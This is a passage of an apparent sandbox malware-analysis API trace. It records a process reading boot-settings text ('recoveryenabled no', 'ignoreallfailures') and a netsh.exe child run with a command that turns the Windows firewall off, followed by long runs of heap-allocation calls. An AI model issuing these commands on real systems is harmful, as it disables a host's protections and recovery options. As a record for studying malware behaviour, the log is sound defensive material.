lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34e, cchWideChar=1 | out: lpWideCharStr="-ecoveryenabled no\nnoreallfailures\n") returned 1 [0213.655] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.655] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.655] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e350, cchWideChar=1 | out: lpWideCharStr="qcoveryenabled no\nnoreallfailures\n") returned 1 [0213.655] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.655] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.655] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.656] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e352, cchWideChar=1 | out: lpWideCharStr="uoveryenabled no\nnoreallfailures\n") returned 1 [0213.656] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.656] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.656] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.656] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e354, cchWideChar=1 | out: lpWideCharStr="iveryenabled no\nnoreallfailures\n") returned 1 [0213.656] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.656] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.656] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.656] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e356, cchWideChar=1 | out: lpWideCharStr="eeryenabled no\nnoreallfailures\n") returned 1 [0213.656] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.656] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.656] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.656] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e358, cchWideChar=1 | out: lpWideCharStr="tryenabled no\nnoreallfailures\n") returned 1 [0213.656] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.656] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.656] ReadFile (hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0) Process: id = "19" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x15e20000" os_pid = "0x32c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x69c" cmd_line = "netsh advfirewall set currentprofile state off" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 113 os_tid = 0x5f0 [0124.663] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fc10 | out: lpSystemTimeAsFileTime=0x14fc10*(dwLowDateTime=0x51515f10, dwHighDateTime=0x1d4f12b)) [0124.663] GetCurrentProcessId () returned 0x32c [0124.663] GetCurrentThreadId () returned 0x5f0 [0124.663] GetTickCount () returned 0xad5e [0124.663] QueryPerformanceCounter (in: lpPerformanceCount=0x14fc18 | out: lpPerformanceCount=0x14fc18*=8898858496) returned 1 [0124.664] GetModuleHandleW (lpModuleName=0x0) returned 0x1440000 [0124.664] __set_app_type (_Type=0x1) [0124.664] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x144ad14) returned 0x0 [0124.664] __wgetmainargs (in: _Argc=0x14555c0, _Argv=0x14555d0, _Env=0x14555c8, _DoWildCard=0, _StartInfo=0x14555dc | out: _Argc=0x14555c0, _Argv=0x14555d0, _Env=0x14555c8) returned 0 [0124.665] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.665] GetModuleHandleW (lpModuleName=0x0) returned 0x1440000 [0124.665] _vsnwprintf (in: _Buffer=0x1457a40, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x147768 | out: _Buffer="netsh>") returned 6 [0124.665] GetProcessHeap () returned 0x150000 [0124.665] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1726f0 [0124.665] GetProcessHeap () returned 0x150000 [0124.665] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172710 [0124.665] GetProcessHeap () returned 0x150000 [0124.665] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172730 [0124.665] GetProcessHeap () returned 0x150000 [0124.665] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172750 [0124.665] GetProcessHeap () returned 0x150000 [0124.665] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172770 [0124.665] GetProcessHeap () returned 0x150000 [0124.665] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172790 [0124.665] GetProcessHeap () returned 0x150000 [0124.665] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1727e0 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172800 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172820 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172840 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172860 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172880 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1728a0 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1728c0 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1728e0 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172900 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172920 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172940 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172960 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172980 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1729a0 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1729c0 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1729e0 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172a00 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172a20 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172a40 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172a60 [0124.666] GetProcessHeap () returned 0x150000 [0124.666] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172a80 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172aa0 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172ac0 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172ae0 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172b00 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172b20 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172b40 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172b60 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172b80 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172ba0 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172bc0 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172be0 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172c00 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172c20 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172c40 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172c60 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172c80 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172ca0 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172cc0 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172ce0 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172d00 [0124.667] GetProcessHeap () returned 0x150000 [0124.667] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172d20 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172d40 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172d60 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172d80 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172da0 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172dc0 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172de0 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172e00 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172e20 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172e40 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172e60 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172e80 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172ea0 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172ec0 [0124.668] GetProcessHeap () returned 0x150000 [0124.668] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172ee0 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172f00 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172f20 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172f40 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172f60 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172f80 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x172fe0 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173000 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173020 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173040 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173060 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173080 [0124.669] GetProcessHeap () returned 0x150000 [0124.669] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1730a0 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1730c0 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1730e0 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173100 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173120 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173140 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173160 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173180 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1731a0 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1731c0 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1731e0 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173200 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173220 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173240 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173260 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173280 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1732a0 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1732c0 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1732e0 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173300 [0124.670] GetProcessHeap () returned 0x150000 [0124.670] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173320 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173340 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173360 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173380 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1733a0 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1733c0 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1733e0 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173400 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173420 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173440 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173460 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173480 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1734a0 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1734c0 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1734e0 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173500 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173520 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173540 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173560 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173580 [0124.671] GetProcessHeap () returned 0x150000 [0124.671] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1735a0 [0124.671] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1735c0 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1735e0 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173600 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173620 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173640 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173660 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173680 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1736a0 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1736c0 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1736e0 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173700 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173720 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173740 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173760 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173780 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1737e0 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173800 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173820 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173840 [0124.672] GetProcessHeap () returned 0x150000 [0124.672] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173860 [0124.672] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173880 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1738a0 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1738c0 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1738e0 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173900 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173920 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173940 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173960 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173980 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1739a0 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1739c0 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x1739e0 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173a00 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173a20 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap (HeapHandle=0x150000, Flags=0x0, Size=0x10) returned 0x173a40 [0124.673] GetProcessHeap () returned 0x150000 [0124.673] RtlAllocateHeap 